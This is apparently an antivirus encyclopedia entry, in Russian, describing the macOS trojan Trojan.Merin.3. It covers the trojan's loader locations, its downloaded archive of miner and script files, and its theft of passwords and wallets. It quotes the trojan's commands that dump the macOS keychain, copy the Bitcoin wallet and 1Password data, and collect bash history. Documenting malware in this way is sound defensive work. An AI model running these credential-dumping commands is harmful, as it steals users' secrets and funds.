Троянская программа для MacOS. После загрузки и запуска инфицированного приложения Trojan.Merin.3 выполняет специальный скрипт, который запускает загрузчик троянца. Загрузчик помещается в одну из папок в домашней директории:
- Library/evoCam4
- Library/Manager
- Library/Pixel_mator
с именем или eCamd или twitterd.
Загрузчик качает архив bin.bop с одного из FTP-серверов. В архиве содержатся файлы для биткойна и основной модуль троянца:
- DiabloMiner
- acab.sh
- fxagent
- kc_dump.sh
- kcd.scpt
- kd.sh
- launch.sh
- mids.sh
- p_start.sh
Основной троянский модуль Trojan.Merin.3 способен красть на инфицированном компьютере пользовательские пароли, данные электронных кошельков, а также логи командного интерпретатора bash (.bash_history), и отсылать все эти данные на удаленный сервер, принадлежащий злоумышленникам.
Выполняет команды:
...
uuencode $HOME/Library/Application\ Support/Bitcoin/wallet.dat xyz >> $D_FILE
...
zip -X -r key.zip $HOME/Library/Application\ Support/1Password/1Password.agilekeychain > /dev/null
...
cat "$HOME/.bash_history" >> $D_FILE
...
security dump-keychain -d > s_dump.txt